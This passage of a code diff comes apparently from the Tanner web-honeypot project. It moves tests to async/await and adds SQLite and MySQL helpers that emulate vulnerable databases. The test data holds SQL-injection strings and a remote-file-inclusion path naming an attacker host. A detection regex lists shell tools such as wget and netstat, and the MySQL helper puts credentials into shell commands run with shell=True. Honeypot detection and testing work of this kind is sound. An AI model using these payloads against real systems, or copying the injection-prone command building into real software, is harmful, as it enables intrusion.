- self.m_eof = mock.Mock()
- self.m_eof.return_value = (lambda: (yield None))()
-
- def test_make_response(self):
- msg = 'test'
- content = json.loads(self.handler._make_response(msg).decode('utf-8'))
- assert_content = dict(version=1, response=dict(message=msg))
- self.assertDictEqual(content, assert_content)
-
- def test_handle_request_for_dorks(self):
- with mock.patch('aiohttp.Response.write', self.m, create=True):
- with mock.patch('aiohttp.Response.write_eof', self.m_eof, create=True):
- message = mock.Mock()
- message.headers = []
- message.path = '/dorks'
- message.version = (1, 1)
-
- asyncio.get_event_loop().run_until_complete(self.handler.handle_request(message, None))
- content = b''.join([c[1][0] for c in list(self.m.mock_calls)]).decode('utf-8')
- content = json.loads(content)
-
- assert_content = dict(version=1, response=dict(dorks=[x for x in range(10)]))
- self.assertDictEqual(content, assert_content)
-
- def test_handle_request_rfi(self):
- rand = mock.Mock()
- rand.return_value = [x for x in range(10)]
- self.handler.base_handler.emulators['rfi'].handle = mock.Mock(return_value=(lambda: (yield None))())
-
- with mock.patch('aiohttp.Response.write', self.m, create=True):
- with mock.patch('aiohttp.Response.write_eof', self.m_eof, create=True):
- message = mock.Mock()
- message.headers = []
- message.path = '/event'
- message.version = (1, 1)
-
- @asyncio.coroutine
- def foobar():
- return b'{"method":"GET","path":"/vuln_page.php?file=http://attacker_site/malicous_page"}'
-
- payload = mock.Mock()
- payload.read = foobar
-
- asyncio.get_event_loop().run_until_complete(self.handler.handle_request(message, payload))
+ self.serv.session_manager.add_or_update_session = _add_or_update_mock
- content = b''.join([c[1][0] for c in list(self.m.mock_calls)]).decode('utf-8')
- content = json.loads(content)
-
- assert_content = dict(
- version=1,
- response=dict(message=dict(detection=dict(name='rfi', order=2, payload=None), sess_uuid=str(self.test_uuid)))
- )
+ async def choosed(client):
+ return [x for x in range(10)]
- self.assertDictEqual(content, assert_content)
+ dorks = mock.Mock()
+ dorks.choose_dorks = choosed
+ dorks.extract_path = self._make_coroutine()
- def test_hadle_request_index(self):
- rand = mock.Mock()
- rand.return_value = [x for x in range(10)]
+ self.serv.dorks = dorks
- with mock.patch('aiohttp.Response.write', self.m, create=True):
- with mock.patch('aiohttp.Response.write_eof', self.m_eof, create=True):
- message = mock.Mock()
- message.headers = []
- message.path = '/event'
- message.version = (1, 1)
+ super(TestServer, self).setUp()
- @asyncio.coroutine
- def foobar():
- return b'{"method":"GET","path":"/index.html"}'
+ def _make_coroutine(self):
+ async def coroutine(*args, **kwargs):
+ return mock.Mock(*args, **kwargs)
- payload = mock.Mock()
- payload.read = foobar
+ return coroutine
- asyncio.get_event_loop().run_until_complete(self.handler.handle_request(message, payload))
+ def get_app(self):
+ app = self.serv.create_app(loop=self.loop)
+ return app
- content = b''.join([c[1][0] for c in list(self.m.mock_calls)]).decode('utf-8')
- content = json.loads(content)
+ @unittest_run_loop
+ async def test_example(self):
+ request = await self.client.request("GET", "/")
+ assert request.status == 200
+ text = await request.text()
+ assert "Tanner server" in text
- assert_content = dict(
- version=1,
- response=dict(message=dict(detection=dict(name='index', order=1), sess_uuid=str(self.test_uuid)))
- )
+ def test_make_response(self):
+ msg = 'test'
+ content = self.serv._make_response(msg)
+ assert_content = dict(version=1, response=dict(message=msg))
+ self.assertDictEqual(content, assert_content)
- self.assertDictEqual(content, assert_content)
+ @unittest_run_loop
+ async def test_events_request(self):
+ async def _make_handle_coroutine(*args, **kwargs):
+ return {'name': 'index', 'order': 1, "payload": None}
+
+ detection_assert = {'version': 1, 'response': {
+ 'message': {'detection': {'name': 'index', 'order': 1, "payload": None}, 'sess_uuid': str(self.test_uuid)}}}
+ self.serv.base_handler.handle = _make_handle_coroutine
+ request = await self.client.request("POST", "/event", data=b"{\"path\":\"/index.html\"}")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, detection_assert)
+
+ @unittest_run_loop
+ async def test_dorks_request(self):
+ assert_content = dict(version=1, response=dict(dorks=[x for x in range(10)]))
+ request = await self.client.request("GET", "/dorks")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, assert_content)
+
+ @unittest_run_loop
+ async def test_api_request(self):
+ assert_content = {"version": 1, "response": {"message": "tanner api"}}
+ request = await self.client.request("GET", "/api")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, assert_content)
+
+ @unittest_run_loop
+ async def test_stats_api_request(self):
+ async def _make_api_coroutine(*args, **kwargs):
+ return ["1", "2"]
+
+ assert_content = {"version": 1, "response": {"message": ["1", "2"]}}
+ self.serv.api.handle_api_request = _make_api_coroutine
+ request = await self.client.request("GET", "/api/stats")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, assert_content)
diff --git a/tanner/tests/test_session_analyzer.py b/tanner/tests/test_session_analyzer.py
index b5fd3bed..5c37e7f0 100644
--- a/tanner/tests/test_session_analyzer.py
+++ b/tanner/tests/test_session_analyzer.py
@@ -26,39 +26,35 @@
class TestSessionAnalyzer(unittest.TestCase):
def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
self.session = json.loads(session.decode('utf-8'))
- self.handler = SessionAnalyzer()
+ self.handler = SessionAnalyzer(loop=self.loop)
def tests_load_session_fail(self):
- @asyncio.coroutine
- def sess_get():
+ async def sess_get(key):
return asyncio_redis.NotConnectedError
redis_mock = mock.Mock()
redis_mock.get = sess_get
res = None
- loop = asyncio.get_event_loop()
- redis_mock = mock.Mock()
- redis_mock.get = sess_get
- loop.run_until_complete(self.handler.analyze(None, redis_mock))
- self.assertRaises(asyncio_redis.NotConnectedError)
+ with self.assertLogs():
+ self.loop.run_until_complete(self.handler.analyze(None, redis_mock))
def test_create_stats(self):
- @asyncio.coroutine
- def sess_get():
+
+ async def sess_get():
return session
- @asyncio.coroutine
- def set_of_members(key):
+ async def set_of_members(key):
return set()
- @asyncio.coroutine
- def push_list():
+ async def push_list():
return ''
redis_mock = mock.Mock()
redis_mock.get = sess_get
redis_mock.smembers_asset = set_of_members
redis_mock.lpush = push_list
- stats = asyncio.get_event_loop().run_until_complete(self.handler.create_stats(self.session, redis_mock))
+ stats = self.loop.run_until_complete(self.handler.create_stats(self.session, redis_mock))
self.assertEqual(stats['possible_owners'], ['attacker'])
diff --git a/tanner/tests/test_session_manager.py b/tanner/tests/test_session_manager.py
index 49fbc8a8..99f1e9c1 100644
--- a/tanner/tests/test_session_manager.py
+++ b/tanner/tests/test_session_manager.py
@@ -1,3 +1,4 @@
+import asyncio
import unittest
from unittest import mock
@@ -6,7 +7,9 @@
class TestSessions(unittest.TestCase):
def setUp(self):
- self.handler = session_manager.SessionManager()
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.handler = session_manager.SessionManager(loop=self.loop)
self.handler.analyzer = mock.Mock()
self.handler.analyzer.send = mock.Mock()
@@ -86,29 +89,30 @@ def test_validate_missing_cookies(self):
def test_adding_new_session(self):
data = {
- 'peer': {
- },
- 'headers': {},
- 'path': '/foo',
- 'uuid': None,
- 'cookies': {'sess_uuid': None}
- }
- sess = yield from self.handler.add_or_update_session(data)
- assertion_data = {
'peer': {
'ip': None,
'port': None
},
- 'headers': {'user-agent': None},
+ 'headers': {},
'path': '/foo',
'uuid': None,
- 'status': 200,
'cookies': {'sess_uuid': None}
}
- assertion_session = session.Session(assertion_data)
- self.assertEquals(session, assertion_session)
+
+ async def sess_sadd(key, value):
+ return None
+
+ redis_mock = mock.Mock()
+ redis_mock.sadd = sess_sadd
+ sess = self.loop.run_until_complete(self.handler.add_or_update_session(data, redis_mock))
+
+        self.assertEqual([sess], self.handler.sessions)
def test_updating_session(self):
+
+ async def sess_sadd(key, value):
+ return None
+
data = {
'peer': {
'ip': None,
@@ -121,11 +125,22 @@ def test_updating_session(self):
'cookies': {'sess_uuid': None}
}
sess = session.Session(data)
+ data['cookies']['sess_uuid'] = sess.get_uuid()
+ redis_mock = mock.Mock()
+ redis_mock.sadd = sess_sadd
self.handler.sessions.append(sess)
- yield from self.handler.add_or_update_session(data)
+ self.loop.run_until_complete(self.handler.add_or_update_session(data, redis_mock))
self.assertEqual(self.handler.sessions[0].count, 2)
def test_deleting_sessions(self):
+
+ async def analyze(session_key, redis_client):
+ return None
+
+ async def sess_set(key, val):
+ return None
+
+ self.handler.analyzer.analyze = analyze
data = {
'peer': {
'ip': None,
@@ -141,9 +156,9 @@ def test_deleting_sessions(self):
sess.is_expired = mock.MagicMock(name='expired')
sess.is_expired.__bool__.reurned_value = True
self.handler.sessions.append(sess)
- experied = mock.Mock()
- experied.return_value = True
- yield from self.handler.delete_old_sessions()
+ redis_mock = mock.Mock()
+ redis_mock.set = sess_set
+ self.loop.run_until_complete(self.handler.delete_old_sessions(redis_mock))
self.assertListEqual(self.handler.sessions, [])
def test_get_uuid(self):
diff --git a/tanner/tests/test_sqli.py b/tanner/tests/test_sqli.py
index 7e6bcf98..a0ce6a7d 100644
--- a/tanner/tests/test_sqli.py
+++ b/tanner/tests/test_sqli.py
@@ -8,10 +8,9 @@
class SqliTest(unittest.TestCase):
def setUp(self):
- filename = '/tmp/db/test.db'
- os.makedirs(os.path.dirname(filename), exist_ok=True)
- open('/tmp/db/test.db', 'a').close()
-
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+
query_map = {
'users': [{'name':'id', 'type':'INTEGER'}, {'name':'login', 'type':'text'},
{'name':'email', 'type':'text'}, {'name':'username', 'type':'text'},
@@ -19,35 +18,45 @@ def setUp(self):
{'name':'log', 'type':'text'}],
'comments': [{'name':'comment', 'type':'text'}]
}
- self.handler = sqli.SqliEmulator('test.db', '/tmp/')
+ self.handler = sqli.SqliEmulator('test_db', '/tmp/')
self.handler.query_map = query_map
- def test_db_copy(self):
- session = mock.Mock()
- session.sess_uuid.hex = 'ad16014d-9b4a-451d-a6d1-fc8681566458'
- loop = asyncio.get_event_loop()
- loop.run_until_complete(self.handler.create_attacker_db(session))
- self.assertTrue(os.path.exists('/tmp/db/ad16014d-9b4a-451d-a6d1-fc8681566458.db'))
-
def test_map_query_id(self):
query = [('id', '1\'UNION SELECT 1,2,3,4')]
assert_result = 'SELECT * from users WHERE id=1 UNION SELECT 1,2,3,4;'
- loop = asyncio.get_event_loop()
- result = loop.run_until_complete(self.handler.map_query(query))
+ result = self.handler.map_query(query)
self.assertEqual(assert_result, result)
def test_map_query_comments(self):
query = [('comment', 'some_comment" UNION SELECT 1,2 AND "1"="1')]
assert_result = 'SELECT * from comments WHERE comment="some_comment" UNION SELECT 1,2 AND "1"="1";'
- loop = asyncio.get_event_loop()
- result = loop.run_until_complete(self.handler.map_query(query))
+ result = self.handler.map_query(query)
self.assertEqual(assert_result, result)
def test_map_query_error(self):
+ query = [('foo', 'bar\'UNION SELECT 1,2')]
+ result = self.handler.map_query(query)
+ self.assertIsNone(result)
+
+ def test_get_sqli_result(self):
+ query = [('id', '1 UNION SELECT 1,2,3,4')]
+
+ async def mock_execute_query(query, db_name):
+ return [[1, 'name', 'email@mail.com', 'password'], [1, '2', '3', '4']]
+
+ self.handler.sqli_emulator = mock.Mock()
+ self.handler.sqli_emulator.execute_query = mock_execute_query
+
+ assert_result = dict(value="[1, 'name', 'email@mail.com', 'password'] [1, '2', '3', '4']",
+ page='/index.html'
+ )
+ result = self.loop.run_until_complete(self.handler.get_sqli_result(query, 'foo.db'))
+ self.assertEqual(assert_result, result)
+
+ def test_get_sqli_result_error(self):
query = [('foo', 'bar\'UNION SELECT 1,2')]
assert_result = 'You have an error in your SQL syntax; check the manual\
that corresponds to your MySQL server version for the\
right syntax to use near foo at line 1'
- loop = asyncio.get_event_loop()
- result = loop.run_until_complete(self.handler.get_sqli_result(query, 'foo.db'))
- self.assertEqual(assert_result, result)
+ result = self.loop.run_until_complete(self.handler.get_sqli_result(query, 'foo.db'))
+ self.assertEqual(assert_result, result)
\ No newline at end of file
diff --git a/tanner/tests/test_sqlite.py b/tanner/tests/test_sqlite.py
new file mode 100644
index 00000000..da3244c0
--- /dev/null
+++ b/tanner/tests/test_sqlite.py
@@ -0,0 +1,53 @@
+import asyncio
+import os
+import sqlite3
+import unittest
+from unittest import mock
+
+from tanner.emulators import sqlite
+
+class SqliteTest(unittest.TestCase):
+ def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.filename = '/tmp/db/test_db'
+ os.makedirs(os.path.dirname(self.filename), exist_ok=True)
+ open('/tmp/db/test_db', 'a').close()
+ # Insert some testing data
+ conn = sqlite3.connect(self.filename)
+ self.cursor = conn.cursor()
+ self.cursor.execute('CREATE TABLE test (id INTEGER PRIMARY KEY, username text);')
+        self.cursor.execute("INSERT INTO test VALUES(0, 'test0')")
+ conn.commit()
+
+ self.handler = sqlite.SQLITEEmulator('test_db', '/tmp/')
+
+ def tearDown(self):
+ if os.path.exists(self.filename):
+ os.remove(self.filename)
+
+ def test_db_copy(self):
+ session = mock.Mock()
+ session.sess_uuid.hex = 'd877339ec415484987b279469167af3d'
+ self.loop.run_until_complete(self.handler.create_attacker_db(session))
+ self.assertTrue(os.path.exists('/tmp/db/attacker_d877339ec415484987b279469167af3d'))
+
+ def test_create_query_map(self):
+ result = self.handler.helper.create_query_map('/tmp/db', 'test_db')
+ assert_result = {'test': [{'name': 'id', 'type': 'INTEGER'}, {'name': 'username', 'type': 'text'}]}
+ self.assertEqual(result, assert_result)
+
+ def test_insert_dummy_data(self):
+ def mock_generate_dummy_data(data_tokens):
+ return [(1, 'test1'), (2, 'test2')], ['I', 'L']
+
+ self.handler.helper.generate_dummy_data = mock_generate_dummy_data
+
+ self.loop.run_until_complete(self.handler.helper.insert_dummy_data('test', 'I,L', self.cursor))
+ assert_result = [[0, 'test0'], [1, 'test1'], [2, 'test2']]
+
+ result = []
+ for row in self.cursor.execute('SELECT * FROM test;'):
+ result.append(list(row))
+
+ self.assertEqual(result, assert_result)
\ No newline at end of file
diff --git a/tanner/tests/test_xss_emulator.py b/tanner/tests/test_xss_emulator.py
index 46bd19fb..fd5eb38f 100644
--- a/tanner/tests/test_xss_emulator.py
+++ b/tanner/tests/test_xss_emulator.py
@@ -1,3 +1,5 @@
+import asyncio
+
import unittest
from unittest import mock
@@ -7,14 +9,16 @@
class TestXSSEmulator(unittest.TestCase):
def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
self.handler = xss.XssEmulator()
def test_post_xss(self):
data = {
'post_data': {'comment': ''}
}
- xss = yield from self.handler.handle(None, None, data)
- assert_result = dict(name='xss', value='',
+ xss = self.loop.run_until_complete(self.handler.handle(None, None, data))
+ assert_result = dict(value='',
page='/index.html')
self.assertDictEqual(xss, assert_result)
@@ -24,15 +28,15 @@ def test_multiple_post_xss(self):
'name': '',
'email': ''}
}
- xss = yield from self.handler.handle(None, None, data)
+ xss = self.loop.run_until_complete(self.handler.handle(None, None, data))
assert_result = ''
self.assertIn(assert_result, xss['value'])
def test_get_xss(self):
path = '/python.php/?foo='
- xss = yield from self.handler.handle(None, path, None)
+ xss = self.loop.run_until_complete(self.handler.handle(path, None, None))
- assert_result = dict(name='xss', value=path,
+ assert_result = dict(value=path,
page='/index.html')
self.assertDictEqual(xss, assert_result)
@@ -40,11 +44,11 @@ def test_set_xss_page(self):
paths = [{'path': '/python.html', 'timestamp': 1465851064.2740946},
{'path': '/python.php/?foo=bar', 'timestamp': 1465851065.2740946},
{'path': '/python.html/?foo=bar', 'timestamp': 1465851065.2740946}]
- with mock.patch('session.Session') as mock_session:
+ with mock.patch('tanner.session.Session') as mock_session:
mock_session.return_value.paths = paths
sess = session.Session(None)
data = {
'post_data': {'comment': ''}
}
- xss = yield from self.handler.handle(sess, None, data)
+ xss = self.loop.run_until_complete(self.handler.handle(None, sess, data))
self.assertEqual(xss['page'], '/python.html')
diff --git a/tanner/utils/base_db_helper.py b/tanner/utils/base_db_helper.py
new file mode 100644
index 00000000..5e39643d
--- /dev/null
+++ b/tanner/utils/base_db_helper.py
@@ -0,0 +1,58 @@
+import asyncio
+import elizabeth
+import json
+import logging
+import random
+
+from tanner.config import TannerConfig
+
+
+class BaseDBHelper:
+ def __init__(self):
+ self.logger = logging.getLogger('tanner.base_db_helper.BaseDBHelper')
+
+ def read_config(self):
+ with open(TannerConfig.get('DATA', 'db_config')) as db_config:
+ try:
+ config = json.load(db_config)
+ except json.JSONDecodeError as json_error:
+ self.logger.info('Failed to load json: %s', json_error)
+ else:
+ return config
+
+ def generate_dummy_data(self, data_tokens):
+ """
+ Insert dummy data based on data tokens
+ I - integer id
+ L - login/username
+ E - email
+ P - password
+ T - piece of text
+ :return:
+ """
+
+ token_list = data_tokens.split(',')
+
+ samples_count = random.randint(100, 1000)
+ inserted_data = []
+ for i in range(samples_count):
+ values = []
+ for token in token_list:
+ if token == 'I':
+ values.append(i)
+ if token == 'L':
+ data = elizabeth.Personal().username()
+ values.append(data)
+ if token == 'E':
+ data = elizabeth.Personal().email()
+ values.append(data)
+ if token == 'P':
+ data = elizabeth.Personal().password()
+ values.append(data)
+ if token == 'T':
+                    sample_length = random.randint(1, 10)
+                    data = elizabeth.Text().text(quantity=sample_length)
+ values.append(data)
+ inserted_data.append(tuple(values))
+
+ return inserted_data, token_list
diff --git a/tanner/utils/mysql_db_helper.py b/tanner/utils/mysql_db_helper.py
new file mode 100644
index 00000000..4ca1aabd
--- /dev/null
+++ b/tanner/utils/mysql_db_helper.py
@@ -0,0 +1,137 @@
+import asyncio
+import json
+import logging
+import subprocess
+import aiomysql
+
+from tanner.config import TannerConfig
+from tanner.utils.base_db_helper import BaseDBHelper
+
+class MySQLDBHelper(BaseDBHelper):
+ def __init__(self):
+ super(MySQLDBHelper, self).__init__()
+ self.logger = logging.getLogger('tanner.db_helper.MySQLDBHelper')
+
+ async def connect_to_db(self):
+        conn = await aiomysql.connect(host=TannerConfig.get('SQLI', 'host'),
+                                      user=TannerConfig.get('SQLI', 'user'),
+                                      password=TannerConfig.get('SQLI', 'password')
+                                      )
+ return conn
+
+    async def check_db_exists(self, db_name):
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+        check_DB_exists_query = 'SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA '
+        check_DB_exists_query += 'WHERE SCHEMA_NAME=%s'
+        await cursor.execute(check_DB_exists_query, (db_name,))
+ result = await cursor.fetchall()
+ #return 0 if no such database exists else 1
+ return len(result)
+
+ async def setup_db_from_config(self, name=None):
+ config = self.read_config()
+ if name is not None:
+ db_name = name
+ else:
+ db_name = config['name']
+
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ create_db_query = 'CREATE DATABASE {db_name}'
+ await cursor.execute(create_db_query.format(db_name=db_name))
+ await cursor.execute('USE {db_name}'.format(db_name=db_name))
+
+ for table in config['tables']:
+ query = table['schema']
+ await cursor.execute(query)
+ await self.insert_dummy_data(table['table_name'], table['data_tokens'], cursor)
+ await conn.commit()
+
+ conn.close()
+
+ async def delete_db(self, db):
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ delete_db_query = 'DROP DATABASE {db_name}'
+ await cursor.execute(delete_db_query.format(db_name=db))
+ await conn.commit()
+ conn.close()
+
+ async def copy_db(self, user_db, attacker_db):
+ db_exists = await self.check_db_exists(attacker_db)
+ if db_exists:
+ self.logger.info('Attacker db already exists')
+ else:
+ #create new attacker db
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ await cursor.execute('CREATE DATABASE {db_name}'.format(db_name=attacker_db))
+ conn.close()
+ # copy user db to attacker db
+ dump_db_cmd = 'mysqldump -h {host} -u {user} -p{password} {db_name}'
+ restore_db_cmd = 'mysql -h {host} -u {user} -p{password} {db_name}'
+ dump_db_cmd = dump_db_cmd.format(host = TannerConfig.get('SQLI', 'host'),
+ user = TannerConfig.get('SQLI', 'user'),
+ password = TannerConfig.get('SQLI', 'password'),
+ db_name=user_db
+ )
+ restore_db_cmd = restore_db_cmd.format(host = TannerConfig.get('SQLI', 'host'),
+ user = TannerConfig.get('SQLI', 'user'),
+ password = TannerConfig.get('SQLI', 'password'),
+ db_name=attacker_db
+ )
+ try:
+ dump_db_process = subprocess.Popen(dump_db_cmd, stdout = subprocess.PIPE, shell = True)
+ restore_db_process = subprocess.Popen(restore_db_cmd, stdin = dump_db_process.stdout, shell = True)
+ dump_db_process.stdout.close()
+ dump_db_process.wait()
+ restore_db_process.wait()
+ except subprocess.CalledProcessError as e:
+ self.logger.error('Error during copying sql database : %s' % e)
+ return attacker_db
+
+ async def insert_dummy_data(self, table_name, data_tokens, cursor):
+ inserted_data, token_list = self.generate_dummy_data(data_tokens)
+
+ inserted_string_patt = '%s'
+ if len(token_list) > 1:
+ inserted_string_patt += ','
+ inserted_string_patt *= len(token_list)
+ inserted_string_patt = inserted_string_patt[:-1]
+
+ await cursor.executemany("INSERT INTO " + table_name + " VALUES(" +
+ inserted_string_patt + ")", inserted_data)
+
+ async def create_query_map(self, db_name):
+ query_map = {}
+ tables = []
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+
+ select_tables = 'SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema= \'{db_name}\''
+
+ try:
+ await cursor.execute(select_tables.format(db_name=db_name))
+ result = await cursor.fetchall()
+ for row in result:
+ tables.append(row[0])
+        except Exception as e:
+            self.logger.error('Error during query map creation: %s', e)
+ else:
+ query_map = dict.fromkeys(tables)
+ for table in tables:
+ query = 'SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name= \'{table_name}\' AND table_schema= \'{db_name}\''
+ columns = []
+ try:
+ await cursor.execute(query.format(table_name=table, db_name=db_name))
+ result = await cursor.fetchall()
+ for row in result:
+                    if row[7] == 'int':
+ columns.append(dict(name=row[3], type='INTEGER'))
+ else:
+ columns.append(dict(name=row[3], type='TEXT'))
+ query_map[table] = columns
+                except Exception as e:
+                    self.logger.error('Error during query map creation: %s', e)
+ return query_map
\ No newline at end of file
diff --git a/tanner/utils/patterns.py b/tanner/utils/patterns.py
index 56cb15b0..d801ae8d 100644
--- a/tanner/utils/patterns.py
+++ b/tanner/utils/patterns.py
@@ -6,6 +6,7 @@
LFI_ATTACK = re.compile('.*(\/\.\.)*(home|proc|usr|etc)\/.*')
LFI_FILEPATH = re.compile('((\.\.|\/).*)')
XSS_ATTACK = re.compile('.*<(.|\n)*?>')
+CMD_ATTACK = re.compile('.*(alias|cat|cd|cp|echo|exec|find|for|grep|ifconfig|ls|man|mkdir|netstat|ping|ps|pwd|uname|wget|touch|while).*')
REMOTE_FILE_URL = re.compile('(.*(http(s){0,1}|ftp(s){0,1}):.*)')
WORD_PRESS_CONTENT = re.compile('\/wp-content\/.*')
HTML_TAGS = re.compile('.*<(.*)>.*')
diff --git a/tanner/utils/db_helper.py b/tanner/utils/sqlite_db_helper.py
similarity index 54%
rename from tanner/utils/db_helper.py
rename to tanner/utils/sqlite_db_helper.py
index 196d1883..44464ff1 100644
--- a/tanner/utils/db_helper.py
+++ b/tanner/utils/sqlite_db_helper.py
@@ -1,90 +1,32 @@
import asyncio
-import elizabeth
import json
import logging
import os
import random
-import re
import shutil
import sqlite3
from tanner.config import TannerConfig
+from tanner.utils.base_db_helper import BaseDBHelper
-
-class DBHelper:
+class SQLITEDBHelper(BaseDBHelper):
def __init__(self):
- self.logger = logging.getLogger('tanner.db_helper.DBHelper')
-
- @asyncio.coroutine
- def read_config(self, working_dir):
- with open(TannerConfig.get('DATA', 'db_config')) as db_config:
- try:
- config = json.load(db_config)
- except json.JSONDecodeError as json_error:
- self.logger.info('Failed to load json: %s', json_error)
- else:
- return config
-
- @staticmethod
- @asyncio.coroutine
- def insert_dummy_data(table_name, data_tokens, cursor):
- """
- Insert dummy data based on data tokens
- I - integer id
- L - login/username
- E - email
- P - password
- T - piece of text
- :return:
- """
-
- token_list = data_tokens.split(',')
-
- samples_count = random.randint(100, 1000)
- inserted_data = []
- for i in range(samples_count):
- values = []
- for token in token_list:
- if token == 'I':
- values.append(i)
- if token == 'L':
- data = elizabeth.Personal().username()
- values.append(data)
- if token == 'E':
- data = elizabeth.Personal().email()
- values.append(data)
- if token == 'P':
- data = elizabeth.Personal().password()
- values.append(data)
- if token == 'T':
- sample_length = random.randint(1,10)
- data = elizabeth.Text().text(quantity= sample_length)
- values.append(data)
- inserted_data.append(tuple(values))
-
- inserted_string_patt = '?'
- if len(token_list) > 1:
- inserted_string_patt += ','
- inserted_string_patt *= len(token_list)
- inserted_string_patt = inserted_string_patt[:-1]
+ super(SQLITEDBHelper, self).__init__()
+ self.logger = logging.getLogger('tanner.sqlite_db_helper.SQLITEDBHelper')
- cursor.executemany("INSERT INTO " + table_name + " VALUES(" +
- inserted_string_patt + ")", inserted_data)
-
- @asyncio.coroutine
- def setup_db_from_config(self, working_dir, name=None):
- config = yield from self.read_config(working_dir)
+ async def setup_db_from_config(self, working_dir, name=None):
+ config = self.read_config()
if name is not None:
db_name = os.path.join(working_dir, name)
else:
- db_name = os.path.join(working_dir, config['name'] + '.db')
+ db_name = os.path.join(working_dir, config['name'])
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
for table in config['tables']:
query = table['schema']
cursor.execute(query)
- yield from self.insert_dummy_data(table['table_name'], table['data_tokens'], cursor)
+ await self.insert_dummy_data(table['table_name'], table['data_tokens'], cursor)
conn.commit()
conn.close()
@@ -95,7 +37,11 @@ def get_abs_path(path, working_dir):
path = os.path.normpath(os.path.join(working_dir, path))
return path
- @asyncio.coroutine
+ @staticmethod
+ def delete_db(db):
+ if db is not None and os.path.exists(db):
+ os.remove(db)
+
def copy_db(self, src, dst, working_dir):
src = self.get_abs_path(src, working_dir)
dst = self.get_abs_path(dst, working_dir)
@@ -105,7 +51,18 @@ def copy_db(self, src, dst, working_dir):
shutil.copy(src, dst)
return dst
- @asyncio.coroutine
+ async def insert_dummy_data(self, table_name, data_tokens, cursor):
+ inserted_data, token_list = self.generate_dummy_data(data_tokens)
+
+ inserted_string_patt = '?'
+ if len(token_list) > 1:
+ inserted_string_patt += ','
+ inserted_string_patt *= len(token_list)
+ inserted_string_patt = inserted_string_patt[:-1]
+
+ cursor.executemany("INSERT INTO " + table_name + " VALUES(" +
+ inserted_string_patt + ")", inserted_data)
+
def create_query_map(self, working_dir, db_name, ):
query_map = {}
tables = []